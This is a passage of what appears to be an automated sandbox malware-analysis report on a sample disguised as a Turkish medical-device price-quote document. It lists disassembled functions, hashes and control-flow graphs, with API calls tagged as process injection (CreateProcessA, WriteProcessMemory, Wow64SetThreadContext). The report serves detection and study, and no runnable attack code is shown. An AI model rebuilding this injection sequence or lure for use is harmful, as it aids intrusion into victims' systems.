                                                                                                    • Instruction Fuzzy Hash: 8362D274D01229CFDB24DF69C984BDEBBB2BB89300F5085EAD449A7251DB319E96CF40
                                                                                                    Function 07421230 Relevance: 1.4, Strings: 1, Instructions: 162COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2257938097.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7420000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: d
                                                                                                    • API String ID: 0-2564639436
                                                                                                    • Opcode ID: 9789a9bd28f08dea0837d058edd59f6aa97b0a1cf652c9316fefe7c960146471
                                                                                                    • Instruction ID: 48c7d28be6eb69a7342e8bb21e685c0fc28b365b1ae184f695ec21ce2164391d
                                                                                                    • Opcode Fuzzy Hash: 9789a9bd28f08dea0837d058edd59f6aa97b0a1cf652c9316fefe7c960146471
                                                                                                    • Instruction Fuzzy Hash: ED610A71E04269CFDB28DF66CC407EEB7B2AB89300F5081AAD408A7351DB355A86DF80
                                                                                                    Function 07423668 Relevance: .7, Instructions: 725COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2257938097.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7420000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 6a1f11c20af7e4aa3e52d98c1df7953b91f3dfa46488fa35a9654cdb71cbcd3a
                                                                                                    • Instruction ID: 605ff02ebe3229bdedc38c7917620eb79df6359a1ec7f20c162e45483af5a50a
                                                                                                    • Opcode Fuzzy Hash: 6a1f11c20af7e4aa3e52d98c1df7953b91f3dfa46488fa35a9654cdb71cbcd3a
                                                                                                    • Instruction Fuzzy Hash: F95292B4B00125DFCB04DF69D488AAEBBB2BF84710F55816AE806DB361DB34DC52DB90
                                                                                                    Function 00F13E34 Relevance: .2, Instructions: 196COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2243019160.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_f10000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: fba59d8332cb797901723a20745c6b7532f928feaed02d509752691284d8a233
                                                                                                    • Instruction ID: f8ed8a46bde6bd2158a86b9e9879a608e07f0eb908bb46bd07a59075ffa1c3ff
                                                                                                    • Opcode Fuzzy Hash: fba59d8332cb797901723a20745c6b7532f928feaed02d509752691284d8a233
                                                                                                    • Instruction Fuzzy Hash: DA81C474E00209DFDB18DFE9D854AEEBBB2FF88300F108129E519AB365DA755942DF50
                                                                                                    Function 00F16F90 Relevance: .1, Instructions: 142COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2243019160.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_f10000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 33bd867df5c45288289bff4df9fcc094bfc8a2df2bf2d0d463c314d535589f59
                                                                                                    • Instruction ID: 35fcdf7df8fbf5a8422fddd9a815887e7e7a9580140f8251af530bf70f2077c4
                                                                                                    • Opcode Fuzzy Hash: 33bd867df5c45288289bff4df9fcc094bfc8a2df2bf2d0d463c314d535589f59
                                                                                                    • Instruction Fuzzy Hash: B551D370E00259DFCB18DFA9D891AEEBBB2BF89300F14812AD415BB365DA345946CF90
                                                                                                    Function 07740015 Relevance: .1, Instructions: 80COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258876429.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7740000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 116b40df4650ae1b7aea12bde75a528a2908ca2b03c973d219b622638bb79665
                                                                                                    • Instruction ID: 6eecb37be6da12028d85273d394d36c67e69561ed5caa93ff4511757a112d641
                                                                                                    • Opcode Fuzzy Hash: 116b40df4650ae1b7aea12bde75a528a2908ca2b03c973d219b622638bb79665
                                                                                                    • Instruction Fuzzy Hash: 853165B1D053488FDB19CFA6C8553DEBFB6AF8A340F14C0AAC505AB265DB740945CFA1
                                                                                                    Function 0774818B Relevance: .0, Instructions: 20COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258876429.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7740000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d610c39b313e8f3dab6324d156c8c5dceb40849691cee38c9f2244b1bed58a96
                                                                                                    • Instruction ID: dba232ed9923b6ba9edd366290cdf9f11de2136fed71beff9e134ad8ac122bf4
                                                                                                    • Opcode Fuzzy Hash: d610c39b313e8f3dab6324d156c8c5dceb40849691cee38c9f2244b1bed58a96
                                                                                                    • Instruction Fuzzy Hash: A8D0E2B486E10CCBC720EF64C8045B8BBBCEB4F390F40609AC41EA7212D3308944CF06
                                                                                                    Function 07745C94 Relevance: 1.8, APIs: 1, Instructions: 254processCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 908 7745c94-7745c96 909 7745c9f-7745ca1 908->909 910 7745c98-7745c9a 908->910 911 7745ca3-7745d35 909->911 910->911 912 7745c9c-7745c9e 910->912 915 7745d37-7745d41 911->915 916 7745d6e-7745d8e 911->916 912->909 915->916 917 7745d43-7745d45 915->917 923 7745dc7-7745df6 916->923 924 7745d90-7745d9a 916->924 918 7745d47-7745d51 917->918 919 7745d68-7745d6b 917->919 921 7745d55-7745d64 918->921 922 7745d53 918->922 919->916 921->921 925 7745d66 921->925 922->921 930 7745e2f-7745ee9 CreateProcessA 923->930 931 7745df8-7745e02 923->931 924->923 926 7745d9c-7745d9e 924->926 925->919 928 7745da0-7745daa 926->928 929 7745dc1-7745dc4 926->929 932 7745dac 928->932 933 7745dae-7745dbd 928->933 929->923 944 7745ef2-7745f78 930->944 945 7745eeb-7745ef1 930->945 931->930 934 7745e04-7745e06 931->934 932->933 933->933 935 7745dbf 933->935 936 7745e08-7745e12 934->936 937 7745e29-7745e2c 934->937 935->929 939 7745e14 936->939 940 7745e16-7745e25 936->940 937->930 939->940 940->940 941 7745e27 940->941 941->937 955 7745f88-7745f8c 944->955 956 7745f7a-7745f7e 944->956 945->944 958 7745f9c-7745fa0 955->958 959 7745f8e-7745f92 955->959 956->955 957 7745f80 956->957 957->955 960 7745fb0-7745fb4 958->960 961 7745fa2-7745fa6 958->961 959->958 962 7745f94 959->962 964 7745fc6-7745fcd 960->964 965 7745fb6-7745fbc 960->965 961->960 963 7745fa8 961->963 962->958 963->960 966 7745fe4 964->966 967 7745fcf-7745fde 964->967 965->964 969 7745fe5 966->969 967->966 969->969
                                                                                                    APIs
                                                                                                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 07745ED6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258876429.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7740000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 963392458-0
                                                                                                    • Opcode ID: ee8c0a261b84a61e8eb46499734c69cdcaa7fc7339216d243da8182944ceaf89
                                                                                                    • Instruction ID: 664b073f580cc624ca30447e9194af44106d75bf03a8e4b8a621a70227b4980b
                                                                                                    • Opcode Fuzzy Hash: ee8c0a261b84a61e8eb46499734c69cdcaa7fc7339216d243da8182944ceaf89
                                                                                                    • Instruction Fuzzy Hash: 8CA15AB1D0071ACFEF20DF68C8857EDBBB2AF45350F1485A9E818A7240DB749995CF91
                                                                                                    Function 07745CA0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 970 7745ca0-7745d35 973 7745d37-7745d41 970->973 974 7745d6e-7745d8e 970->974 973->974 975 7745d43-7745d45 973->975 981 7745dc7-7745df6 974->981 982 7745d90-7745d9a 974->982 976 7745d47-7745d51 975->976 977 7745d68-7745d6b 975->977 979 7745d55-7745d64 976->979 980 7745d53 976->980 977->974 979->979 983 7745d66 979->983 980->979 988 7745e2f-7745ee9 CreateProcessA 981->988 989 7745df8-7745e02 981->989 982->981 984 7745d9c-7745d9e 982->984 983->977 986 7745da0-7745daa 984->986 987 7745dc1-7745dc4 984->987 990 7745dac 986->990 991 7745dae-7745dbd 986->991 987->981 1002 7745ef2-7745f78 988->1002 1003 7745eeb-7745ef1 988->1003 989->988 992 7745e04-7745e06 989->992 990->991 991->991 993 7745dbf 991->993 994 7745e08-7745e12 992->994 995 7745e29-7745e2c 992->995 993->987 997 7745e14 994->997 998 7745e16-7745e25 994->998 995->988 997->998 998->998 999 7745e27 998->999 999->995 1013 7745f88-7745f8c 1002->1013 1014 7745f7a-7745f7e 1002->1014 1003->1002 1016 7745f9c-7745fa0 1013->1016 1017 7745f8e-7745f92 1013->1017 1014->1013 1015 7745f80 1014->1015 1015->1013 1018 7745fb0-7745fb4 1016->1018 1019 7745fa2-7745fa6 1016->1019 1017->1016 1020 7745f94 1017->1020 1022 7745fc6-7745fcd 1018->1022 1023 7745fb6-7745fbc 1018->1023 1019->1018 1021 7745fa8 1019->1021 1020->1016 1021->1018 1024 7745fe4 1022->1024 1025 7745fcf-7745fde 1022->1025 1023->1022 1027 7745fe5 1024->1027 1025->1024 1027->1027
                                                                                                    APIs
                                                                                                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 07745ED6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258876429.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7740000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 963392458-0
                                                                                                    • Opcode ID: 6cfd0eda63cb0182ed91aae9de9bec668b79d78417dc91f4ef56528dde65f236
                                                                                                    • Instruction ID: 09cd6b5033dfd330e91d0721266a5afb356a1f22626d8030e5c5fb2be104a828
                                                                                                    • Opcode Fuzzy Hash: 6cfd0eda63cb0182ed91aae9de9bec668b79d78417dc91f4ef56528dde65f236
                                                                                                    • Instruction Fuzzy Hash: 89915BB1D0061ADFEF14DF68C8857EEBBB2BF48310F1485A9E818A7240DB749995CF91
                                                                                                    Function 00F1B300 Relevance: 1.7, APIs: 1, Instructions: 200COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1028 f1b300-f1b31f 1029 f1b321-f1b32e call f1acc4 1028->1029 1030 f1b34b-f1b34f 1028->1030 1035 f1b330 1029->1035 1036 f1b344 1029->1036 1032 f1b351-f1b35b 1030->1032 1033 f1b363-f1b3a4 1030->1033 1032->1033 1039 f1b3b1-f1b3bf 1033->1039 1040 f1b3a6-f1b3ae 1033->1040 1083 f1b336 call f1b5a8 1035->1083 1084 f1b336 call f1b598 1035->1084 1036->1030 1041 f1b3c1-f1b3c6 1039->1041 1042 f1b3e3-f1b3e5 1039->1042 1040->1039 1044 f1b3d1 1041->1044 1045 f1b3c8-f1b3cf call f1acd0 1041->1045 1047 f1b3e8-f1b3ef 1042->1047 1043 f1b33c-f1b33e 1043->1036 1046 f1b480-f1b540 1043->1046 1049 f1b3d3-f1b3e1 1044->1049 1045->1049 1078 f1b542-f1b545 1046->1078 1079 f1b548-f1b573 GetModuleHandleW 1046->1079 1050 f1b3f1-f1b3f9 1047->1050 1051 f1b3fc-f1b403 1047->1051 1049->1047 1050->1051 1053 f1b410-f1b419 call f1ace0 1051->1053 1054 f1b405-f1b40d 1051->1054 1059 f1b426-f1b42b 1053->1059 1060 f1b41b-f1b423 1053->1060 1054->1053 1061 f1b449-f1b44d 1059->1061 1062 f1b42d-f1b434 1059->1062 1060->1059 1085 f1b450 call f1b879 1061->1085 1086 f1b450 call f1b888 1061->1086 1062->1061 1064 f1b436-f1b446 call f1acf0 call f1ad00 1062->1064 1064->1061 1067 f1b453-f1b456 1069 f1b479-f1b47f 1067->1069 1070 f1b458-f1b476 1067->1070 1070->1069 1078->1079 1080 f1b575-f1b57b 1079->1080 1081 f1b57c-f1b590 1079->1081 1080->1081 1083->1043 1084->1043 1085->1067 1086->1067
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00F1B566
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2243019160.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_f10000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HandleModule
                                                                                                    • String ID:
                                                                                                    • API String ID: 4139908857-0
                                                                                                    • Opcode ID: 32b7c18e55558825d36505f057967f55146794bc7522f23ad054ad594f94ba1f
                                                                                                    • Instruction ID: 267a97f86fda8a09d85b2304db7d52542ad6111db1e8aa2c559bb5141d9ffe1d
                                                                                                    • Opcode Fuzzy Hash: 32b7c18e55558825d36505f057967f55146794bc7522f23ad054ad594f94ba1f
                                                                                                    • Instruction Fuzzy Hash: F9815370A00B05CFDB24CF2AD45179ABBF2BF88310F00892ED096DBA51DB74E895DB91
                                                                                                    Function 00F1590C Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1087 f1590c-f159d9 CreateActCtxA 1089 f159e2-f15a3c 1087->1089 1090 f159db-f159e1 1087->1090 1097 f15a4b-f15a4f 1089->1097 1098 f15a3e-f15a41 1089->1098 1090->1089 1099 f15a51-f15a5d 1097->1099 1100 f15a60 1097->1100 1098->1097 1099->1100 1102 f15a61 1100->1102 1102->1102
                                                                                                    APIs
                                                                                                    • CreateActCtxA.KERNEL32(?), ref: 00F159C9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2243019160.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_f10000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Create
                                                                                                    • String ID:
                                                                                                    • API String ID: 2289755597-0
                                                                                                    • Opcode ID: 6936ca1f3f5a9b3de50f116c14403dd370ed4eaa1d338a0984eebd746313d4cb
                                                                                                    • Instruction ID: 1262229fef3c2bffabd1561b07306eddea4d7c3b7ca3d03aeb3a740ebe6bc287
                                                                                                    • Opcode Fuzzy Hash: 6936ca1f3f5a9b3de50f116c14403dd370ed4eaa1d338a0984eebd746313d4cb
                                                                                                    • Instruction Fuzzy Hash: 0741E2B0C00719CFDB25DFA9C884BDDBBB5BF88704F24815AD448AB252DB759986CF50
                                                                                                    Function 00F144B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1103 f144b4-f159d9 CreateActCtxA 1106 f159e2-f15a3c 1103->1106 1107 f159db-f159e1 1103->1107 1114 f15a4b-f15a4f 1106->1114 1115 f15a3e-f15a41 1106->1115 1107->1106 1116 f15a51-f15a5d 1114->1116 1117 f15a60 1114->1117 1115->1114 1116->1117 1119 f15a61 1117->1119 1119->1119
                                                                                                    APIs
                                                                                                    • CreateActCtxA.KERNEL32(?), ref: 00F159C9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2243019160.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_f10000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Create
                                                                                                    • String ID:
                                                                                                    • API String ID: 2289755597-0
                                                                                                    • Opcode ID: b76a866c1cd9254937d496931d4e6a46e01851bdbcbbec503843a5a4d33f52d9
                                                                                                    • Instruction ID: 191d5d528ccd12cfc377f8c5daddf5d89b212cca80babc4b4fbd0a83a13000d8
                                                                                                    • Opcode Fuzzy Hash: b76a866c1cd9254937d496931d4e6a46e01851bdbcbbec503843a5a4d33f52d9
                                                                                                    • Instruction Fuzzy Hash: B541E2B0C0071DCBDB24DFA9C884BDEBBB5BF88714F20815AD408AB251DB756945CF90
                                                                                                    Function 077455D9 Relevance: 1.6, APIs: 1, Instructions: 78injectionCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1120 77455d9-77455da 1121 77455e3-774562e 1120->1121 1122 77455dc-77455e1 1120->1122 1125 7745630-774563c 1121->1125 1126 774563e-774567d WriteProcessMemory 1121->1126 1122->1121 1125->1126 1128 7745686-77456b6 1126->1128 1129 774567f-7745685 1126->1129 1129->1128
                                                                                                    APIs
                                                                                                    • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 07745670
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258876429.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7740000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MemoryProcessWrite
                                                                                                    • String ID:
                                                                                                    • API String ID: 3559483778-0
                                                                                                    • Opcode ID: f9f564bdbca0a82b0a3a29edeb30da06d973e3e1ab84f488784b13e6725224fd
                                                                                                    • Instruction ID: c40c4547ef9403a078caad5db111a0f7798208ffe735961263c7509be0509b64
                                                                                                    • Opcode Fuzzy Hash: f9f564bdbca0a82b0a3a29edeb30da06d973e3e1ab84f488784b13e6725224fd
                                                                                                    • Instruction Fuzzy Hash: 273136B19003499FDF10CFA9C8847EEBFF5AF48314F10842AE918A7241D7B59915CBA5
                                                                                                    Function 07745440 Relevance: 1.6, APIs: 1, Instructions: 73threadCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1133 7745440-7745442 1134 7745444-7745446 1133->1134 1135 774544b-774544e 1133->1135 1136 774544f-7745493 1134->1136 1137 7745448-7745449 1134->1137 1135->1136 1139 7745495-77454a1 1136->1139 1140 77454a3-77454d3 Wow64SetThreadContext 1136->1140 1137->1135 1139->1140 1142 77454d5-77454db 1140->1142 1143 77454dc-774550c 1140->1143 1142->1143
                                                                                                    APIs
                                                                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 077454C6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258876429.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7740000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ContextThreadWow64
                                                                                                    • String ID:
                                                                                                    • API String ID: 983334009-0
                                                                                                    • Opcode ID: 19ec074541a0c5c91c45a1ced3b89a1e1b58ab9feb0f14ea0ccfc3ae3d4dba7a
                                                                                                    • Instruction ID: 870f869bfd425e994915a73585a4263064027b207ec27e34d4f6aa4e14f687d9
                                                                                                    • Opcode Fuzzy Hash: 19ec074541a0c5c91c45a1ced3b89a1e1b58ab9feb0f14ea0ccfc3ae3d4dba7a
                                                                                                    • Instruction Fuzzy Hash: 9A217AB19003099FEB10CFA9C4857EEBFF4EF88364F248429D518AB240C778A945CBA5
                                                                                                    Function 077456C8 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1147 77456c8-77456ca 1148 77456d3-774575d ReadProcessMemory 1147->1148 1149 77456cc-77456d1 1147->1149 1153 7745766-7745796 1148->1153 1154 774575f-7745765 1148->1154 1149->1148 1154->1153
                                                                                                    APIs
                                                                                                    • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 07745750
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258876429.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7740000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MemoryProcessRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 1726664587-0
                                                                                                    • Opcode ID: 0fd276875bb8c896659f43cd76c291fdd742b74ede66e6158cecae563da18456
                                                                                                    • Instruction ID: 08664f2b6654920714b8710ce157f7bb454ba237578a804fb5e088f4765648aa
                                                                                                    • Opcode Fuzzy Hash: 0fd276875bb8c896659f43cd76c291fdd742b74ede66e6158cecae563da18456
                                                                                                    • Instruction Fuzzy Hash: A62137B1800349DFDF10CFAAC8846EEBBB5FF48360F24842AE518A7240C7759515CBA5
                                                                                                    Function 05F2EFC0 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1158 5f2efc0-5f2f014 1160 5f2f016-5f2f01c 1158->1160 1161 5f2f01f-5f2f02e 1158->1161 1160->1161 1162 5f2f033-5f2f06c DrawTextExW 1161->1162 1163 5f2f030 1161->1163 1164 5f2f075-5f2f092 1162->1164 1165 5f2f06e-5f2f074 1162->1165 1163->1162 1165->1164
                                                                                                    APIs
                                                                                                    • DrawTextExW.USER32(?,?,?,?,?,?), ref: 05F2F05F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2255615905.0000000005F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F20000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_5f20000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DrawText
                                                                                                    • String ID:
                                                                                                    • API String ID: 2175133113-0
                                                                                                    • Opcode ID: 0cbf7a497c9b015f537e536cf33fb498a3c11dce899106ff9c1267d9230799c1
                                                                                                    • Instruction ID: a2cbd4e920b91c52f1dfb4a27b93296979babba40669ada761f290f6904e7061
                                                                                                    • Opcode Fuzzy Hash: 0cbf7a497c9b015f537e536cf33fb498a3c11dce899106ff9c1267d9230799c1
                                                                                                    • Instruction Fuzzy Hash: 3831E0B5D002099FDB10CF9AD884ADEFBF4FB48320F14842AE919A7210D775A940CFA1
                                                                                                    Function 077455E0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1177 77455e0-774562e 1180 7745630-774563c 1177->1180 1181 774563e-774567d WriteProcessMemory 1177->1181 1180->1181 1183 7745686-77456b6 1181->1183 1184 774567f-7745685 1181->1184 1184->1183
                                                                                                    APIs
                                                                                                    • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 07745670
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258876429.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7740000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MemoryProcessWrite
                                                                                                    • String ID:
                                                                                                    • API String ID: 3559483778-0
                                                                                                    • Opcode ID: dceec46014eac7e7079bf54dae2a13d7e32647f44ca191d0c7ebbe4485af5bcf
                                                                                                    • Instruction ID: 9d68805e721474d982eb0d9bf3b874a26cda2eec803f1156f14fb077d384e50f
                                                                                                    • Opcode Fuzzy Hash: dceec46014eac7e7079bf54dae2a13d7e32647f44ca191d0c7ebbe4485af5bcf
                                                                                                    • Instruction Fuzzy Hash: F92126B19003499FDB10CFA9C885BDEBBF5FF48314F108829E918A7250C7789954CBA5
                                                                                                    Function 05F2EFC8 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1168 5f2efc8-5f2f014 1169 5f2f016-5f2f01c 1168->1169 1170 5f2f01f-5f2f02e 1168->1170 1169->1170 1171 5f2f033-5f2f06c DrawTextExW 1170->1171 1172 5f2f030 1170->1172 1173 5f2f075-5f2f092 1171->1173 1174 5f2f06e-5f2f074 1171->1174 1172->1171 1174->1173
                                                                                                    APIs
                                                                                                    • DrawTextExW.USER32(?,?,?,?,?,?), ref: 05F2F05F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2255615905.0000000005F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F20000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_5f20000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DrawText
                                                                                                    • String ID:
                                                                                                    • API String ID: 2175133113-0
                                                                                                    • Opcode ID: 6205f3107a1f651a745f8c8e343bd6c32680ff9408c79523290740398059afae
                                                                                                    • Instruction ID: 819ccce2bc343c5ee4f2a670ac8e018a20c8736a749c60d433e064da74d3c8ba
                                                                                                    • Opcode Fuzzy Hash: 6205f3107a1f651a745f8c8e343bd6c32680ff9408c79523290740398059afae
                                                                                                    • Instruction Fuzzy Hash: FB21C0B5D003099FDB10CF9AD884A9EFBF5FB48320F14842AE919A7210D775A944CFA1
                                                                                                    Function 00F1D090 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1188 f1d090-f1d85c DuplicateHandle 1190 f1d865-f1d882 1188->1190 1191 f1d85e-f1d864 1188->1191 1191->1190
                                                                                                    APIs
                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00F1D78E,?,?,?,?,?), ref: 00F1D84F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2243019160.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
